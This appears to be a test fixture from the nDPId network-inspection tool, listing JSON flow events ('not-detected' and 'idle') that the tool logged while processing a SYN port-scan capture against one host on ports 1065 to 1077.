-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 